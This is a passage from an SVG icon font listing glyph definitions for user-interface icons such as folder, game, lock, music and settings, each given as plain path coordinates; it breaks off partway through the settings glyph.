<glyph glyph-name="ui-folder" horiz-adv-x="1000" unicode="&#xec5b;" d="M857 7h-754c8 22 16 43 24 64 39 104 78 207 116 311 14 36 56 62 90 62 204-1 408-1 613 0 23 0 41-6 51-28 3-7 5-13 0-25-46-126-94-257-140-384z m-543 686c1-3 1-6 3-9 18-36 36-72 53-108 3-6 7-8 14-8 142 0 285 0 428 0 29 0 55-21 60-51 1-3 0-7 0-11h-12c-174 0-348 0-522 0-60 0-108-26-140-78-11-17-17-38-24-58-37-97-73-194-110-292-3-7-6-9-14-7-24 6-48 25-50 47v526c0 46 34 49 49 49h265z" />
<glyph glyph-name="ui-game" horiz-adv-x="1000" unicode="&#xec5c;" d="M1000 459c-11-70-25-158-41-246-7-43-16-87-30-129-26-80-92-110-171-80-55 21-95 60-114 117-13 38-26 77-37 116-6 18-16 27-36 26-48-1-95-1-143 0-20 0-30-8-36-26-12-41-25-81-39-121-27-79-111-131-192-120-45 6-75 34-87 75-17 59-30 119-42 180-12 64-21 129-30 195-17 124 77 241 202 253 52 6 99-5 145-30 16-9 35-14 53-14 61-2 122-3 183 0 22 0 45 8 65 19 79 43 157 46 235 1 75-43 111-112 115-216z m-261 61c-11-1-19-1-28-1-8-1-17 0-26-1-27-2-43-18-42-42 0-23 16-38 43-39 17-1 34 0 53 0 0-13 0-21 0-30 0-9 0-19 1-28 4-26 20-41 43-40 23 2 38 18 39 44 1 17 1 34 1 52 11 1 19 1 28 1 9 1 19 0 28 1 24 2 42 21 41 42-1 22-17 37-41 39-18 1-36 0-57 0 0 19 0 35 0 50 0 29-15 47-40 48-23 1-41-17-43-45-1-17 0-33 0-51z m-337-46c-1 31-27 55-58 54-29-1-54-27-53-56 1-32 26-56 57-55 31 1 55 26 54 57z m-216 105c-1-31 23-57 52-57 31-1 58 25 59 56 1 30-26 55-57 55-30 0-54-24-54-54z m0-213c0-30 25-56 53-56 32 1 59 27 58 58-1 30-28 55-58 55-28 0-54-27-53-57z m-51 51c30 0 56 25 57 55 0 30-27 56-57 56-30 0-55-25-56-54-1-31 25-57 56-57z" />
<glyph glyph-name="ui-handicapped" horiz-adv-x="1000" unicode="&#xec5d;" d="M583 108c-33-80-112-137-204-137-122 0-220 99-220 220 0 86 49 160 122 196v130c-141-42-243-172-243-326 0-188 153-341 341-341 134 0 251 79 306 192l-36 67-66-1z m349-107h-64l-122 229c-5 8-13 13-22 15-5 6-13 11-23 11h-248v128h215c16 0 30 14 30 31v29c0 17-14 30-30 30h-215v147c53 11 92 57 92 113 0 64-51 116-115 116s-116-52-116-116c0-35 16-66 40-87 0-2-1-4-1-5v-445c0-16 14-30 31-30h294l122-227c4-7 10-12 17-14 6-8 15-13 25-13h90c16 0 30 13 30 30v28c0 17-14 30-30 30z" />
<glyph glyph-name="ui-home" horiz-adv-x="1000" unicode="&#xec5e;" d="M500-69c-75 0-150 1-225 0-105-1-164 82-161 161 4 72 2 145 1 217 0 16 3 26 19 34 117 61 233 124 349 186 13 7 23 7 35 0 116-63 232-125 349-186 14-8 19-16 18-32 0-75 0-150 0-225 0-89-64-154-153-155-78 0-155 0-232 0z m436 479c-13 5-27 9-39 16-125 65-249 131-372 199-19 10-33 9-50-1-126-68-251-134-377-201-43-23-86-5-96 40-7 27 7 54 38 70 116 62 231 124 347 185 30 16 60 34 92 47 13 5 33 5 45-1 148-77 295-156 441-234 29-15 41-43 33-71-9-29-31-46-62-49z" />
<glyph glyph-name="ui-image" horiz-adv-x="1000" unicode="&#xec5f;" d="M1 351c0 133 2 267-1 401-1 68 26 98 94 98 271-1 542-1 813 0 70 0 94-32 93-99-1-268-1-535 0-803 1-68-25-98-94-98-271 1-542 2-813 0-71 0-94 33-93 99 2 134 1 268 1 402z m858 349h-717c0-175-2-344 2-513 1-18 33-50 51-50 202-4 404-4 606 0 19 1 55 35 55 54 5 166 3 332 3 509z m-462-210c27-69 47-120 72-186l183 332c42-153 76-282 114-421h-546c58 91 112 173 177 275z" />
<glyph glyph-name="ui-laoding" horiz-adv-x="1000" unicode="&#xec60;" d="M500 850c-50 0-91-41-91-91s41-91 91-91c50 0 91 41 91 91s-41 91-91 91z m0-818c-50 0-91-41-91-91 0-50 41-91 91-91 50 0 91 41 91 91 0 50-41 91-91 91z m409 409c-50 0-91-41-91-91 0-50 41-91 91-91s91 41 91 91c0 50-41 91-91 91z m-727-91c0 50-40 91-91 91s-91-41-91-91c0-50 41-91 91-91s91 41 91 91z m672 225c35 35 35 93 0 129-36 35-94 35-129 0-36-36-36-94 0-129 35-36 93-36 129 0z m-708-450c-35-35-35-93 0-129 36-35 94-35 129 0 36 36 36 94 0 129-35 36-93 36-129 0z m579 0c-36-35-36-93 0-129 35-35 93-35 129 0 35 36 35 94 0 129-36 36-94 36-129 0z m-450 450c36 35 36 93 0 129s-93 35-129 0c-35-36-35-94 0-129 36-36 94-36 129 0z" />
<glyph glyph-name="ui-lock" horiz-adv-x="1000" unicode="&#xec61;" d="M782 507c-11 192-133 343-282 343-149 0-271-151-282-343-91-24-158-107-158-206v-238c0-117 96-213 213-213h454c117 0 213 96 213 213v238c0 99-67 182-158 206z m-230-366v-68c0-59-24-107-52-107-28 0-52 48-52 107v68c-41 19-70 61-70 110 0 68 54 123 122 123s122-55 122-123c0-49-29-91-70-110z m-215 374c8 115 78 205 163 205s155-90 163-205h-326z" />
<glyph glyph-name="ui-love-add" horiz-adv-x="1000" unicode="&#xec62;" d="M661 340h-101c-32 0-58 26-58 58v112c0 32 26 58 58 58h101v93c-90 29-198-1-258-116-115 219-406 129-403-89 4-237 296-278 403-435v0l0 0c57 84 168 135 259 201-1 3-1 6-1 10v108z m310 179h-133v131c0 16-14 29-30 29h-71c-16 0-30-13-30-29l0-131h-130c-16 0-29-13-29-29v-72c0-16 13-29 29-29h130l0-133c0-16 14-29 30-29h71c17 0 30 13 30 29v133h133c16 0 29 13 29 29v72c0 16-13 29-29 29z" />
<glyph glyph-name="ui-love-broken" horiz-adv-x="1000" unicode="&#xec63;" d="M596 708l96-91-189-131 162-92-195-173 108 146-195 114 136 87-128 149c-165 100-394-14-391-230 4-295 367-346 500-541v0l0 0 0 0v0c133 195 496 246 500 541 3 221-238 336-404 221z" />
<glyph glyph-name="ui-love-remove" horiz-adv-x="1000" unicode="&#xec64;" d="M529 405v117c0 34 28 62 61 62h229c-80 136-298 161-395-25-120 232-427 137-424-93 4-250 312-293 424-459v0l0 0c91 134 310 188 392 336h-226c-33 0-61 28-61 62z m440 127h-361c-17 0-31-14-31-31v-75c0-17 14-31 31-31h361c17 0 31 14 31 31v75c0 17-14 31-31 31z" />
<glyph glyph-name="ui-love" horiz-adv-x="1000" unicode="&#xec65;" d="M500 597c-142 273-504 161-500-110 4-294 367-346 500-540v-1l0 1c133 194 496 246 500 540 4 271-358 383-500 110z" />
<glyph glyph-name="ui-map" horiz-adv-x="1000" unicode="&#xec66;" d="M0-32v793c107 8 215 15 324 23v-782c-108-11-215-22-324-34z m501-1c-48 12-91 22-133 33-5 2-10 12-10 19 0 141 0 282 0 422 0 105 0 209 0 313 0 9 0 19 0 30 75-19 148-37 221-55 14-3 27-8 41-10 12-2 15-8 15-20 0-66 0-133 0-200 0-13-5-17-16-21-65-25-116-66-153-124-73-117-65-260 20-368 4-5 8-10 15-19z m232-51c-148 1-269 121-269 267 0 147 121 268 269 269 147 1 268-122 267-271-1-147-120-266-267-265z m195 291c-5 98-110 178-173 170-7-19-14-39-23-62-7 19-14 35-18 51-3 14-11 17-22 12-22-8-45-16-65-28-49-28-76-73-89-128-3-11-1-17 12-20 16-4 32-11 53-18-26-9-46-16-65-23 2-85 88-170 172-172 7 20 14 40 23 66 9-26 16-47 23-68 96 15 166 85 172 174-21 7-41 14-66 23 26 9 46 16 66 23z m-4 227c-78 58-162 76-256 59v73c0 45 0 90 1 135 0 6 6 16 11 17 79 22 158 43 238 64 1 0 4 0 6 0v-348z m-261-178c8-6 16-11 25-17 14-10 23-7 29 9 5 13 9 27 15 45 7-18 12-32 18-48 37 23 73 45 109 67l2-2c-22-36-44-71-67-109l48-18c-17-6-29-10-42-14-19-7-22-15-11-31 5-8 9-15 12-25-8 5-16 10-24 16-14 9-23 6-28-9-5-14-10-28-16-45-7 18-12 32-18 48-36-23-72-46-108-68l-3 2c22 36 44 72 67 109-15 6-29 11-47 18 18 6 32 10 45 16 14 5 19 14 9 28-6 8-12 16-17 25l2 3z" />
<glyph glyph-name="ui-message" horiz-adv-x="1000" unicode="&#xec67;" d="M1000 491v-24c0-100 0-201 0-302-1-90-64-157-154-157-230-1-460-1-690 0-92 0-156 66-156 157 0 101 0 202 0 302v25c45-19 86-36 128-54 103-45 205-92 309-135 42-18 88-17 130 2 95 40 189 82 283 123 43 18 86 37 129 56 6 2 12 4 21 7z m-501 201c138 0 277 1 415 0 55 0 86-32 86-86 0-14-5-19-17-24-120-52-239-104-359-156-27-12-54-23-80-35-31-15-62-12-92 1-145 63-291 127-436 191-7 3-15 14-15 22-3 54 29 87 84 87 138 1 276 0 414 0z" />
<glyph glyph-name="ui-messaging" horiz-adv-x="1000" unicode="&#xec68;" d="M892 827h-783c-60 0-109-49-109-108v-467c0-59 49-108 109-108h222v-271l271 271h290c59 0 108 49 108 108v467c0 59-49 108-108 108z" />
<glyph glyph-name="ui-movie" horiz-adv-x="1000" unicode="&#xec69;" d="M500 850c-276 0-500-224-500-500 0-276 224-500 500-500 276 0 500 224 500 500 0 276-224 500-500 500z m0-96c70 0 127-57 127-127 0-70-57-127-127-127-70 0-127 57-127 127 0 70 57 127 127 127z m-398-281c28 64 104 93 168 64 64-28 93-104 65-168-29-64-104-93-169-64-64 28-93 104-64 168z m316-456c-52-47-132-43-179 10-47 52-43 132 9 179 52 47 133 43 180-9 47-52 43-133-10-180z m14 333c0 37 31 68 68 68 37 0 68-31 68-68s-31-67-68-67c-37 0-68 30-68 67z m304-345c-59-38-138-22-176 37-38 59-22 138 37 176 59 39 138 22 176-37 39-59 22-138-37-176z m66 290c-70-11-135 37-146 106-11 70 37 135 106 146 69 11 135-37 146-106 11-70-37-135-106-146z" />
<glyph glyph-name="ui-music-player" horiz-adv-x="1000" unicode="&#xec6a;" d="M500 244c-60 0-109-49-109-109 0-60 49-108 109-108 60 0 109 48 109 108 0 60-49 109-109 109z m216 606h-431c-48 0-87-39-87-87v-826c0-48 39-87 87-87h431c48 0 87 39 87 87v826c0 48-39 87-87 87z m-433-110c0 24 19 43 43 43h348c24 0 44-19 44-43v-283c0-24-20-43-44-43h-348c-24 0-43 19-43 43v283z m217-833c-126 0-228 102-228 228 0 126 102 229 228 229s229-103 229-229c0-126-103-228-229-228z" />
<glyph glyph-name="ui-music" horiz-adv-x="1000" unicode="&#xec6b;" d="M990 510c-1 12-3 24-5 36-3 11-7 20-10 27-1 1-1 2-2 4-32 52-79 87-130 119-37 23-75 43-114 62-17 8-27 20-28 40-1 40-3 41-42 50-7 4-12 2-18 0-21-13-28-31-28-56 1-174 1-348 1-522 0-8-1-15-1-23-139 66-269 55-386-40-118-94-96-242 42-301 115-49 272-19 361 69 40 41 62 88 61 147-2 148 0 297-1 445 0 17 5 22 22 19 100-17 180-64 238-148 10-15 18-30 28-45 12 49 15 88 12 117z m-15 63c3-7 7-16 10-27-2 9-5 18-10 27z m-887-398c-18 0-26 13-21 33 19 80 93 147 177 161 6 1 11 2 17 3 17 3 32-1 35-20 2-18-11-24-27-27-12-2-25-3-37-7-61-19-100-59-119-119-4-14-9-24-25-24z m-55 135c-16-1-26 13-23 30 11 49 67 95 118 96 13 0 24-7 25-21 2-17-9-25-24-27-36-5-61-23-72-58-1-3-2-6-3-9-5-8-12-11-21-11z m665-334c17 0 27-13 23-30-10-50-67-96-117-96-14 0-24 6-25 21-2 17 8 24 24 26 36 5 60 24 71 59 1 3 3 6 4 8 4 8 11 12 20 12z" />
<glyph glyph-name="ui-mute" horiz-adv-x="1000" unicode="&#xec6c;" d="M531 390l2-2c-1 0-2 0-2 2z m-85-43c0-94 1-188-1-281 0-13-5-32-15-38-8-5-28 0-38 8-74 54-149 108-220 166-13 11-18 40-18 61 0 69 2 138 5 208 1 11 10 25 19 33 69 54 139 107 211 159 11 8 31 14 41 9 10-5 17-26 17-40 1-95-1-190-1-285 0 0-2 2 0 0z m-356 2c0-35-1-70 0-105 1-17-4-24-22-26-63-7-67-4-68 59 0 57 1 114 0 170 0 25 8 35 34 35 56 0 56 1 56-53 0-27 0-53 0-80z m764-19l126 127c24 24 27 61 5 82-21 21-58 19-82-5l-126-127-127 127c-24 24-61 26-83 5-21-21-19-58 5-82l127-127-126-126c-25-25-27-62-6-83 22-21 59-19 83 5l127 127 126-127c24-24 61-26 82-5 22 21 19 59-5 83l-126 126z" />
<glyph glyph-name="ui-network" horiz-adv-x="1000" unicode="&#xec6d;" d="M1000 441c-2-104-49-221-144-319-24-24-61-15-69 16-5 16 1 30 12 41 49 49 85 107 103 174 43 156 9 295-102 414-11 12-18 25-14 42 8 30 45 40 68 17 35-34 64-73 87-117 39-72 59-152 59-268z m-1000 73c2 103 49 221 144 319 24 24 61 15 70-17 4-16-2-29-13-40-49-50-85-107-103-174-43-156-9-295 102-414 12-13 18-26 14-42-8-31-45-40-68-18-35 35-64 74-87 117-39 73-59 152-59 269z m261 240c15-1 28-8 35-24 7-16 5-31-8-44-20-21-37-43-51-68-62-113-44-257 45-350 10-10 19-21 18-36-1-17-10-30-25-36-16-6-31-4-44 9-23 22-42 48-59 76-42 71-59 148-50 231 9 88 45 164 107 228 9 9 19 14 32 14z m620-282c-2-102-38-191-110-265-21-22-54-17-67 9-7 16-4 34 11 48 35 37 62 80 74 130 27 109 3 206-75 289-12 13-17 27-11 44 9 29 45 36 66 15 44-44 75-96 94-155 12-37 17-75 18-115z m-491-326c6 20 11 39 16 59 24 87 49 174 73 261 2 8 5 16 14 19 13 5 24-1 28-16 19-67 37-134 55-201 11-38 22-77 32-115 1-2 1-5 2-7h-220z m-150 329c1 69 25 130 74 180 17 18 42 19 58 3 17-16 17-40 0-58-69-74-69-177-1-252 14-15 17-31 10-47-7-15-23-24-39-23-11 1-20 5-28 13-49 51-74 112-74 184z m520 1c-1-73-25-134-74-184-11-12-25-17-41-13-15 5-25 15-28 30-4 16 1 28 12 39 24 25 41 55 47 89 12 62-4 116-47 162-11 11-16 23-13 38 3 15 13 26 28 30 15 5 29 2 40-10 51-51 75-112 76-181z m-104-485c6-23 12-45 18-67 2-9 6-19 7-28 1-9 0-19-2-28-3-10-11-15-23-15-104 1-208 1-311 0-13 0-16 9-22 18 111 40 221 80 333 120z m-214 31c59 26 119 51 180 77 7-26 14-52 22-79h-202l0 2z m90-45c-69-23-137-46-206-68 1 3 1 5 2 8 5 18 10 37 16 55 0 3 4 6 7 6 59 1 119 1 178 1 1 0 1-1 3-2z m-13 125c-53-23-106-46-160-69 6 24 12 45 19 67 0 2 3 4 5 4 45 0 90 0 136 0l0-2z" />
<glyph glyph-name="ui-next" horiz-adv-x="1000" unicode="&#xec6e;" d="M954 426c-118 90-237 179-359 262-80 54-142 24-151-71-3-45-4-91-3-136-94 71-189 141-287 207-79 54-142 24-150-71-8-86-2-173-2-260l2 0c0-94-6-188 2-281 7-85 70-115 138-69 101 69 200 142 299 216-1-49-1-98 4-147 7-85 70-115 138-69 125 85 246 176 367 267 64 48 64 105 2 152z" />
<glyph glyph-name="ui-note" horiz-adv-x="1000" unicode="&#xec6f;" d="M804 850h-607c-69 0-124-56-124-124v-752c0-68 55-124 124-124h607c68 0 124 56 124 124v752c0 68-56 124-124 124z m20-808c0-45-37-82-82-82h-483c-46 0-83 37-83 82v616c0 45 37 83 83 83h483c45 0 82-38 82-83v-616z m-119 363h-410c-23 0-41-18-41-41v-38c0-23 18-41 41-41h410c23 0 42 18 42 41v38c0 23-19 41-42 41z m0 186h-410c-23 0-41-18-41-41v-38c0-23 18-41 41-41h410c23 0 42 18 42 41v38c0 23-19 41-42 41z m0-372h-410c-23 0-41-19-41-41v-38c0-23 18-42 41-42h410c23 0 42 19 42 42v38c0 22-19 41-42 41z" />
<glyph glyph-name="ui-office" horiz-adv-x="1000" unicode="&#xec70;" d="M892 564h-71v147c0 59-49 108-108 108h-425c-60 0-109-49-109-108v-147h-70c-60 0-109-49-109-109v-466c0-60 49-108 109-108h783c59 0 108 48 108 108v466c0 60-49 109-108 109z m-178 90v-89h-428v102c0 30 24 55 54 55h320c30 0 54-25 54-55v-13z" />
<glyph glyph-name="ui-password" horiz-adv-x="1000" unicode="&#xec71;" d="M967 464h-504c-18 0-42 12-53 27 0 0-92 123-189 123-122 0-221-99-221-222 0-122 99-221 221-221 97 0 189 123 189 123 11 15 35 26 53 26h118v1h123v-51h-93v-183h77v93h53v-59h78v59h44v-93h82l0 93v90h-93v51h148v110c0 18-15 33-33 33z m-746-183c-62 0-112 50-112 111 0 62 50 112 112 112s112-50 112-112c0-61-50-111-112-111z" />
<glyph glyph-name="ui-pause" horiz-adv-x="1000" unicode="&#xec72;" d="M315 839c-117 39-221-33-221-155-1-111-1-223 0-334h0c0-118-1-236 0-354 0-65 40-115 101-135 117-39 220 33 221 155 0 111 0 223 0 334h-1c1 118 1 236 1 354 0 65-40 115-101 135z m591-135c0 65-40 115-101 135-117 39-221-33-221-155 0-111 0-223 0-334h0c0-118 0-236 0-354 0-65 40-115 101-135 117-39 221 33 221 155 0 111 0 223 0 334h0c0 118 0 236 0 354z" />
<glyph glyph-name="ui-play-stop" horiz-adv-x="1000" unicode="&#xec73;" d="M885 850h-770c-63 0-115-52-115-115v-770c0-63 52-115 115-115h770c63 0 115 52 115 115v770c0 63-52 115-115 115z m-169-645c0-39-32-71-71-71h-290c-39 0-71 32-71 71v290c0 39 32 71 71 71h290c39 0 71-32 71-71v-290z" />
<glyph glyph-name="ui-play" horiz-adv-x="1000" unicode="&#xec74;" d="M119 360c0 118-8 238 2 356 11 130 97 171 207 97 167-113 330-235 491-358 86-65 86-143-2-209-166-125-332-249-504-367-92-63-179-21-189 95-11 127-2 257-2 386h-3z" />
<glyph glyph-name="ui-pointer" horiz-adv-x="1000" unicode="&#xec75;" d="M500 850c-276 0-500-224-500-500 0-276 224-500 500-500 276 0 500 224 500 500 0 276-224 500-500 500z m79-849v159c0 19-16 35-35 35h-88c-19 0-35-16-35-35v-159c-134 30-240 136-270 270h159c19 0 35 16 35 35v88c0 19-16 35-35 35h-159c30 134 136 240 270 271v-160c0-19 16-35 35-35h88c19 0 35 16 35 35v160c134-31 240-137 271-271h-160c-19 0-35-16-35-35v-88c0-19 16-35 35-35h160c-31-134-137-240-271-270z" />
<glyph glyph-name="ui-power" horiz-adv-x="1000" unicode="&#xec76;" d="M685 670v-173c61-52 100-129 100-216 0-157-127-285-285-285s-284 128-284 285c0 87 39 164 100 216v173c-146-69-246-217-246-389 0-238 192-431 430-431s431 193 431 431c0 172-101 320-246 389z m-190-310h10c45 0 81 37 81 81v328c0 45-36 81-81 81h-10c-44 0-80-36-80-81v-328c0-44 36-81 80-81z" />
<glyph glyph-name="ui-press" horiz-adv-x="1000" unicode="&#xec77;" d="M1000 350v0c0 31-3 62-8 91-32 175-155 318-318 378l-2 1-1 0c-53 19-111 30-171 30h0c-213 0-396-134-467-322-21-56-33-115-33-178v0c0-51 8-100 22-146 24-81 69-153 127-211 81-78 187-130 306-141 15-1 30-2 45-2h0c156 0 296 72 388 184 70 86 112 196 112 316v0z" />
<glyph glyph-name="ui-previous" horiz-adv-x="1000" unicode="&#xec78;" d="M998 343l-2 0c0 94 6 188-2 281-7 85-70 115-138 69-101-69-200-142-299-216 1 49 1 99-4 147-7 85-70 115-137 69-125-85-247-176-368-267-64-48-64-105-1-152 117-90 236-179 358-262 80-54 143-24 151 71 3 45 4 91 3 136 94-71 189-141 287-207 79-54 142-24 150 71 8 86 2 173 2 260z" />
<glyph glyph-name="ui-rate-add" horiz-adv-x="1000" unicode="&#xec79;" d="M716 66h-14c-38 0-69 31-69 69v128h-118c-38 0-69 31-69 69v132c0 38 31 69 69 69h63l-105 241c-8 17-20 17-28 0l-109-250c-7-17-29-33-48-35l-271-26c-19-2-23-14-8-26l204-181c14-12 22-38 18-56l-59-267c-4-18 6-25 22-16l235 138c17 10 43 10 60 0l235-138c16-9 26-2 22 16l-30 133z m250 399h-133v130c0 19-16 35-35 35h-65c-19 0-34-16-34-35v-130h-130c-19 0-34-16-34-35v-65c0-19 15-34 34-34h130l0-132c0-19 15-35 34-35h65c19 0 35 16 35 35l0 132h133c19 0 34 15 34 34v65c0 19-15 35-34 35z" />
<glyph glyph-name="ui-rate-blank" horiz-adv-x="1000" unicode="&#xec7a;" d="M767-129c-15 0-29 5-43 13l-220 129c1 0-1 0-4 0s-4 0-5 0l-219-129c-34-21-74-15-96 12-8 11-21 33-13 67l55 249c0 2-2 7-3 9l-190 168c-25 22-35 52-26 79 9 28 34 46 68 49l253 25c2 0 6 4 7 6l102 232c13 31 38 49 67 49s54-18 68-49l101-233c1-1 6-5 8-5l253-25c33-3 58-21 67-49 9-27-1-57-26-79l-191-169c0-1-2-6-2-9l55-248c8-34-5-56-13-67-13-16-32-25-53-25z m-593 542l121-108c31-27 47-77 39-117l-35-159 139 83c23 13 46 15 62 15s39-2 62-15l140-83-35 159c-9 40 7 90 38 117l121 108-161 15c-42 4-84 35-100 73l-65 149-65-149c-16-38-58-69-100-73l-161-15z" />
<glyph glyph-name="ui-rate-remove" horiz-adv-x="1000" unicode="&#xec7b;" d="M677 204c-4 17 4 40 17 52l16 14h-187c-35 0-64 29-64 64v121c0 35 29 63 64 63h53c-1 1-1 1-1 2l-109 250c-7 16-19 16-26 0l-109-250c-7-17-26-31-44-33l-271-26c-18-2-21-12-8-24l204-181c13-12 21-35 17-52l-59-266c-4-17 6-24 21-15l235 138c15 9 39 9 54 0l236-138c15-9 24-2 20 15l-59 266z m291 261h-427c-17 0-32-14-32-32v-78c0-17 15-31 32-31h427c18 0 32 14 32 31v78c0 18-14 32-32 32z" />
<glyph glyph-name="ui-rating" horiz-adv-x="1000" unicode="&#xec7c;" d="M485 812c8 19 22 19 30 0l119-272c8-19 31-36 52-38l295-29c21-2 25-15 10-29l-222-196c-16-14-25-42-20-62l64-290c4-20-7-28-25-18l-256 151c-17 10-47 10-64 0l-256-151c-18-10-29-2-24 18l64 290c4 20-5 48-20 62l-223 196c-15 14-11 27 10 29l295 29c21 2 44 19 53 38l118 272z" />
<glyph glyph-name="ui-record" horiz-adv-x="1000" unicode="&#xec7d;" d="M918 577c-8-10-19-14-31-11-13 3-22 11-24 25-3 22-9 43-18 63-40 90-137 145-235 133-11-2-21-2-30 6-10 8-14 19-10 31 3 13 11 21 25 23 24 4 49 4 73 1 63-7 118-32 165-75 50-46 80-103 90-170 2-10 0-18-5-26z m-162 141c42-33 68-76 77-129 3-18-8-34-26-37-17-2-32 9-35 28-13 76-77 123-154 115-16-1-27 4-33 16-6 11-4 25 4 35 5 6 12 9 20 10 54 7 103-6 147-38z m-34-217c11-72 0-137-61-186-43-35-59-35-103-2-53 39-105 80-159 118-22 15-25 32-20 56 17 71 61 117 131 134 66 16 125-2 171-54 12-13 22-27 32-41 3-8 6-17 9-25z m-377-109c70-52 137-102 208-156-126-129-249-256-375-386-34 24-67 47-102 73 89 156 178 310 269 469z" />
<glyph glyph-name="ui-remove" horiz-adv-x="1000" unicode="&#xec7e;" d="M0 451c0 24 20 44 44 44h912c24 0 44-20 44-44v-201c0-25-20-45-44-45h-912c-24 0-44 20-44 45v201z" />
<glyph glyph-name="ui-reply" horiz-adv-x="1000" unicode="&#xec7f;" d="M740 116c-129-129-338-129-467 0-128 129-128 338 0 467 111 111 282 126 409 46l-108-109 420-90-90 420-100-99c-195 145-473 130-651-48-195-195-195-511 0-707 196-195 512-195 707 0 49 49 85 105 110 165l-168 41c-16-31-36-60-62-86z" />
<glyph glyph-name="ui-rotation" horiz-adv-x="1000" unicode="&#xec80;" d="M172 356c0 48 12 97 33 141l2 0c15 30 35 59 61 84 110 111 279 126 406 47l-107-107 416-87-45 222-42 194-99-99c-195 145-472 130-649-47-87-88-135-199-144-313l168-35z m657-13c-1-48-12-96-34-140l-1 0c-15-30-36-59-61-84-110-111-279-126-406-47l105 106-415 88 29-144 59-272 99 99c195-145 472-130 649 47 87 87 134 198 143 312l-167 35z" />
<glyph glyph-name="ui-rss" horiz-adv-x="1000" unicode="&#xec81;" d="M891 850h-782c-60 0-109-49-109-109v-782c0-60 49-109 109-109h782c60 0 109 49 109 109v782c0 60-49 109-109 109z m-669-880c-58 0-105 47-105 106 0 58 47 105 105 105 59 0 106-47 106-105 0-59-47-106-106-106z m266 0c-1 204-166 368-370 368 0 0-1 0-1 0v104c0 0 1 0 1 0 261 0 473-211 474-472h-104z m270 0c-33 338-303 606-641 637v119l2 0c418 0 757-338 758-756h-119z" />
<glyph glyph-name="ui-search" horiz-adv-x="1000" unicode="&#xec82;" d="M982 61l-235 216c27 54 43 114 43 178 0 218-177 395-395 395-218 0-395-177-395-395 0-218 177-395 395-395 64 0 124 16 178 43l215-235c22-23 57-24 79-2l117 117c22 22 21 57-2 78z m-587 153c-133 0-241 108-241 241 0 133 108 241 241 241 133 0 241-108 241-241 0-133-108-241-241-241z" />
<glyph glyph-name="ui-settings" horiz-adv-x="1000" unicode="&#xec83;" d="M770 158c-13 5-27 10-39 16-27 13-41 34-41 63-1 30 13 52 39 65 9 5 18 9 28 12 15 5 22 15 20 31-2 34-14 65-37 91-10 12-23 16-38 9-8-4-17-7-25-10-29-10-55-4-76 17-21 20-26 51-14 78 2 5 4 11 6 15 8 15 4 27-7 37-25 22-54 36-88 39-16 1-27-4-33-20-2-8-5-15-9-23-14-26-35-40-64-39-30 0-51 15-63 41-5 10-8 19-12 28-4 15-15 22-29 21-37-3-70-16-97-41-10-10-13-22-7-36 4-8 7-17 10-25 10-27 5-51-13-72-19-21-44-27-72-20-8 3-17 6-25 10-16 8-28 4-39-9-21-25-35-54-38-87-3-22 3-29 23-38 6-2 12-5 18-8 25-14 39-36 38-65-1-30-15-51-42-64-7-3-13-6-20-8-15-5-21-16-20-32 2-30 12-57 29-82 15-23 24-26 50-15 27 11 53 11 78-6 31-22 41-59 24-99-6-15-7-28 5-39 27-23 57-38 92-40 16-1 28 4 33 21 2 7 5 15 9 22 12 27 39 44 67 43 28-1 54-20 64-47 3-6 5-12 7-18 9-20 17-26 39-23 29 4 57 15 80 34 18 14 20 24 12 45-3 6-5 12-7 18-11 29-6 55 16 76 22 22 48 27 77 16 11-4 23-9 34-14 12-6 23-5 31 4 28 29 44 63 44 104 1 12-6 20-18 24z m-377-100c-99 1-178 82-178 181 1 98 82 177 181 176 98 0 177-80 176-179 0-99-80-178-179-178z m2 265c-47 1-87-37-88-84-1-48 37-87 85-89 47-1 87 38 88 85 1 47-38 87-85 88z m-1-127c-23 0-41 18-41 41 0 22 18 40 40 40 22 0 40-18 41-40 0-22-18-40-40-41z m438 264c-1 4-1 8-1 12-1 15 8 29 21 35 13 6 29 3 40-7l8-6c8-8 14-8 23-2 12 9 22 20 29 34 5 11 3 16-5 24-3 2-5 4-8 6-11 11-15 24-10 39 5 15 16 23 32 25 6 1 12 1 19 1 6 0 11 3 13 9 6 20 6 39-4 58-2 6-7 8-14 7-7-1-14-2-21-2-15 0-27 7-34 20-7 13-6 26 3 39 3 4 7 8 10 11 6 6 7 13 3 19-9 15-22 27-39 34-7 3-14 2-19-5-3-4-6-7-9-10-11-12-24-15-39-10-14 5-24 17-25 33 0 2 0 5 0 8 0 9-4 13-12 15-16 5-33 4-49-2-8-3-12-8-11-17 1-4 1-8 1-12 0-15-7-27-20-33-14-7-27-5-39 4-4 3-8 7-11 11-6 5-12 6-18 2-17-10-29-23-35-41-3-7-2-13 5-18 4-3 7-6 10-9 11-10 14-22 11-36-4-14-14-23-29-26-4-1-9-1-13-1-9 0-14-5-16-13-4-17-4-33 2-49 4-11 8-13 20-12 3 0 7 0 10 0 15 0 26-7 32-21 7-14 5-27-4-39-3-3-5-6-8-8-5-6-6-12-2-19 8-14 19-24 33-32 12-7 17-6 26 5 10 11 22 17 37 15 20-2 33-17 34-40 1-8 4-14 12-16 17-5 34-4 51 3 7 3 11 8 10 17z m-130 144c-22 46-3 100 42 123 45 22 100 4 123-42 22-45 4-100-42-122-45-23-100-4-123 41z m63 81c-22-11-31-38-21-60 10-22 37-31 59-21 22 11 32 38 21 60-10 21-37 31-59 21z m29-59c-10-5-23-1-28 9-5 10-1 23 9 28 10 5 22 1 28-9 5-10 1-23-9-28z m198-242c-2 1-5 2-8 3-6 2-10 6-10 13-1 6 1 11 7 14 2 1 3 2 5 3 4 2 5 4 4 7-1 8-4 14-9 19-3 2-6 3-9 1-1-1-3-1-5-2-6-3-11-2-16 2-5 4-7 10-5 16 0 1 1 3 1 4 2 3 1 5-2 7-6 5-12 7-20 7-3 0-5-1-6-5-1-2-1-3-2-5-2-6-7-9-13-10s-11 3-14 8c-1 2-2 4-3 6-1 3-4 4-7 4-8-2-14-5-20-11-2-2-2-5 0-8 1-2 1-3 2-5 3-6 2-11-1-16-4-5-9-6-15-5-2 0-4 1-6 1-3 2-6 0-8-2-4-6-6-13-6-20-1-4 1-6 5-7 2-1 3-1 4-2 6-2 9-7 10-13 0-6-3-11-8-14-1-1-3-2-4-3-3-1-4-3-4-7 1-6 4-12 8-17 4-4 6-5 11-2 6 3 11 3 17 0 7-4 10-11 7-20-1-4-1-6 2-8 6-5 13-7 20-7 4 0 6 1 7 5 0 2 1 3 1 5 3 6 8 10 14 10 6 1 12-3 15-8 0-2 1-3 2-4 2-4 4-5 8-4 6 1 12 4 17 9 3 3 3 5 1 9 0 2-1 3-2 4-2 6-2 12 2 17 5 5 10 6 16 5 3-1 6-2 8-3 3-1 5 0 7 